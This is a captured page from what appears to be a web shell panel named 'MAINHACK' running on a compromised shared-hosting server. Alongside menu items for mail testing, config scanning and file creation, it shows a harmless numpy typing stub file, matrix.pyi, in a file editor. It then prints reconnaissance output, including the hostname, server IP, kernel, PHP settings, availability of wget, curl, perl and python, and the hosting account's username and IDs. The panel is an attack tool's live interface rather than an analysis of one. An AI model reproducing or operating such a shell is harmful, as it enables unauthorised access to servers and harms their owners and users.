[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: matrix.pyi
File is not writable. Editing disabled.
from typing import Any import numpy as np import numpy.typing as npt mat: np.matrix[Any, np.dtype[np.int64]] ar_f8: npt.NDArray[np.float64] reveal_type(mat * 5) # E: matrix[Any, Any] reveal_type(5 * mat) # E: matrix[Any, Any] mat *= 5 reveal_type(mat**5) # E: matrix[Any, Any] mat **= 5 reveal_type(mat.sum()) # E: Any reveal_type(mat.mean()) # E: Any reveal_type(mat.std()) # E: Any reveal_type(mat.var()) # E: Any reveal_type(mat.prod()) # E: Any reveal_type(mat.any()) # E: bool_ reveal_type(mat.all()) # E: bool_ reveal_type(mat.max()) # E: {int64} reveal_type(mat.min()) # E: {int64} reveal_type(mat.argmax()) # E: {intp} reveal_type(mat.argmin()) # E: {intp} reveal_type(mat.ptp()) # E: {int64} reveal_type(mat.sum(axis=0)) # E: matrix[Any, Any] reveal_type(mat.mean(axis=0)) # E: matrix[Any, Any] reveal_type(mat.std(axis=0)) # E: matrix[Any, Any] reveal_type(mat.var(axis=0)) # E: matrix[Any, Any] reveal_type(mat.prod(axis=0)) # E: matrix[Any, Any] reveal_type(mat.any(axis=0)) # E: matrix[Any, dtype[bool_]] reveal_type(mat.all(axis=0)) # E: matrix[Any, dtype[bool_]] reveal_type(mat.max(axis=0)) # E: matrix[Any, dtype[{int64}]] reveal_type(mat.min(axis=0)) # E: matrix[Any, dtype[{int64}]] reveal_type(mat.argmax(axis=0)) # E: matrix[Any, dtype[{intp}]] reveal_type(mat.argmin(axis=0)) # E: matrix[Any, dtype[{intp}]] reveal_type(mat.ptp(axis=0)) # E: matrix[Any, dtype[{int64}]] reveal_type(mat.sum(out=ar_f8)) # E: ndarray[Any, dtype[{float64}]] reveal_type(mat.mean(out=ar_f8)) # E: ndarray[Any, dtype[{float64}]] reveal_type(mat.std(out=ar_f8)) # E: ndarray[Any, dtype[{float64}]] reveal_type(mat.var(out=ar_f8)) # E: ndarray[Any, dtype[{float64}]] reveal_type(mat.prod(out=ar_f8)) # E: ndarray[Any, dtype[{float64}]] reveal_type(mat.any(out=ar_f8)) # E: ndarray[Any, dtype[{float64}]] reveal_type(mat.all(out=ar_f8)) # E: ndarray[Any, dtype[{float64}]] reveal_type(mat.max(out=ar_f8)) # E: ndarray[Any, dtype[{float64}]] reveal_type(mat.min(out=ar_f8)) # E: ndarray[Any, dtype[{float64}]] reveal_type(mat.argmax(out=ar_f8)) # E: ndarray[Any, dtype[{float64}]] reveal_type(mat.argmin(out=ar_f8)) # E: ndarray[Any, dtype[{float64}]] reveal_type(mat.ptp(out=ar_f8)) # E: ndarray[Any, dtype[{float64}]] reveal_type(mat.T) # E: matrix[Any, dtype[{int64}]] reveal_type(mat.I) # E: matrix[Any, Any] reveal_type(mat.A) # E: ndarray[Any, dtype[{int64}]] reveal_type(mat.A1) # E: ndarray[Any, dtype[{int64}]] reveal_type(mat.H) # E: matrix[Any, dtype[{int64}]] reveal_type(mat.getT()) # E: matrix[Any, dtype[{int64}]] reveal_type(mat.getI()) # E: matrix[Any, Any] reveal_type(mat.getA()) # E: ndarray[Any, dtype[{int64}]] reveal_type(mat.getA1()) # E: ndarray[Any, dtype[{int64}]] reveal_type(mat.getH()) # E: matrix[Any, dtype[{int64}]] reveal_type(np.bmat(ar_f8)) # E: matrix[Any, Any] reveal_type(np.bmat([[0, 1, 2]])) # E: matrix[Any, Any] reveal_type(np.bmat("mat")) # E: matrix[Any, Any] reveal_type(np.asmatrix(ar_f8, dtype=np.int64)) # E: matrix[Any, Any]
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium171.web-hosting.com
Server IP: 162.0.209.115
PHP Version: 8.0.30
Server Software: LiteSpeed
System: Linux premium171.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 71.39 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: aircyknj
User ID (UID): 2056
Group ID (GID): 2052
Script Owner UID: 2056
Current Dir Owner: N/A